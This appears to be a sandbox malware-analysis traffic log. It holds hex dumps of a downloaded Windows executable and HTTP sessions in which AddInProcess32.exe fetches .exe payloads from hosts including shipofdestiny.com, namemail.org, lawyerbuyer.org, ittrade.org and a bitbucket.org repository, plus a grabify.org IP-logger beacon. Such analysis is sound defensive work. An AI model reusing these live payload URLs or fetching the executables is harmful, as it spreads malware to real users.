                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: c3 8b ff 55 8b ec 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08
                                                                                                                                                                                                                                                            Data Ascii: Ujju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: ff ff 50 8d 85 08 fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: PP]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: c8 ff e9 0f 02 00 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rE
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 08 6a 0c e8 5b 04 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35
                                                                                                                                                                                                                                                            Data Ascii: j[YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,5405
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: c0 75 08 6a 11 e8 c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8
                                                                                                                                                                                                                                                            Data Ascii: ujY6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: cc cc cc cc cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02
                                                                                                                                                                                                                                                            Data Ascii: DD$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GF


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            48192.168.2.555623104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC705INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE8lvFeduCIN3ASFL86wXY4YMYXcblVTnN27pr9v7fvdAWpNGx%2BczWLVOL%2FGjPAmEFh2X8sFXjCFkzlwZ%2FYnvgq6%2FhfZahXzzROeG4QTcXtLJgloF6Orb%2Fx8BtHDB7XKzQrnlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202f48e109ff-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            49192.168.2.555624172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImxwK2wvUXlySG43RXJ3N29UNzJBRkE9PSIsInZhbHVlIjoib1F4dTkraitXMXUyS0NKMFNKU2hSa3E0ZFdvU0dxZnFhdEZvRFh5TXhCRXdZczFpWTMvQmp2bVBkWHdKQzZSS1hDRU5WOFZLTW5pRmRuRnZEd2ZSOEI5dnpzeGpDa1hzSVgrR0gzR1U1R1BvOHUyOVpydmlqS25paCthN21wd0siLCJtYWMiOiJkOTA5NzVkMGQ1ZDM1MjYwM2RlNDU2MDAxYmE0NmE0NzVhNTY2M2M4ZjNkYjBmYjEyYzJjNzhmNjA5Mzc4OGU3IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:59 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6ImQ3QjlKZjd0aTUyTGprU3orV2tsb0E9PSIsInZhbHVlIjoiaStrdGpvT3lTNWZVdDB0U01TTkNLV0c4QzZZQkEvOTZ1djMvRjc4bG5ZYy9mU2lMdHcxQ3NxTzNtNE1tTGtEQ2xzS1pUcm1RV1BnVHcxZDJ1bGQ3SzJkQnE0TDNGSnJQbEEvL0tkNXZsM1p3OWt3UHNqM1lFQ1dvRmdrbFFkVWEiLCJtYWMiOiIzNmZlZDJhYjk4NjA2ZTQyYTVkODVkNWNmN2I5NGY4ZjQ5NzMwODNmMTJiYzQxNzZiYTg4ZTQwMDk4ZTA3ODNkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:59 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC393INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 42 45 44 6d 6c 69 25 32 42 34 46 52 4f 5a 56 53 4d 58 74 47 39 43 33 4c 43 56 42 37 46 61 52 4f 77 77 45 46 46 49 5a 6e 53 72 68 4e 63 50 35 79 46 72 75 6e 30 63 39 71 43 4b 68 51 36 66 7a 4d 53 46 48 70 61 33 36 57 37 39 25 32 42 69 31 69 73 70 78 77 73 36 78 72 64 37 48 6c 30 66 6b 39 71 68 6c 58 25 32 46 33 45 6f 51 70 4c 65 30 36 50 31 75 48 32 59 67 4b 68 44 39 50 37 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEDmli%2B4FROZVSMXtG9C3LCVB7FaROwwEFFIZnSrhNcP5yFrun0c9qCKhQ6fzMSFHpa36W79%2Bi1ispxws6xrd7Hl0fk9qhlX%2F3EoQpLe06P1uH2YgKhD9P70"}],"group":"cf-nel","max_age":604800}NEL: {"succ
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            50192.168.2.555617172.67.168.15944344932C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC502OUTGET /1wxS HTTP/1.1
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            sec-fetch-dest: document
                                                                                                                                                                                                                                                            sec-fetch-mode: navigate
                                                                                                                                                                                                                                                            sec-fetch-site: none
                                                                                                                                                                                                                                                            sec-fetch-user: ?1
                                                                                                                                                                                                                                                            upgrade-insecure-requests: 1
                                                                                                                                                                                                                                                            Host: grabify.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            set-cookie: 186352584766758=3; expires=Tue, 11-Mar-2025 02:31:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            set-cookie: jasgd1o47akuhs=154.16.105.38; expires=Tue, 11-Mar-2025 02:31:00 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; preload
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; preload
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EZG89zNkWLCWhp0NEAe%2BM%2Fn1qyUbQwU3GzOenw4qfR4XK%2Bo5xgSkH0MaRKlL271eJgtAOxjpdy6q1SwfGGazSp9c%2FPwV9QWeK3BDZ2%2BZYKiQw49Wl09eY7pnn4cH6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202ebac209fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            51192.168.2.555626172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC687INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0X5CZ2y8209kwP8Cv90%2FPECV2myvymkHvQ%2Fu1q%2Fr3F0DVCltYBwCpJZfmFeX0V9NBNJtG2vViUSfx56jxyJFqircEEW40LpZ6Be7u2zERRIWvQp0fzN23TTS4bAGhFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820317a6d0ad9-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            52192.168.2.555622104.192.141.144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC83OUTGET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC4233INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
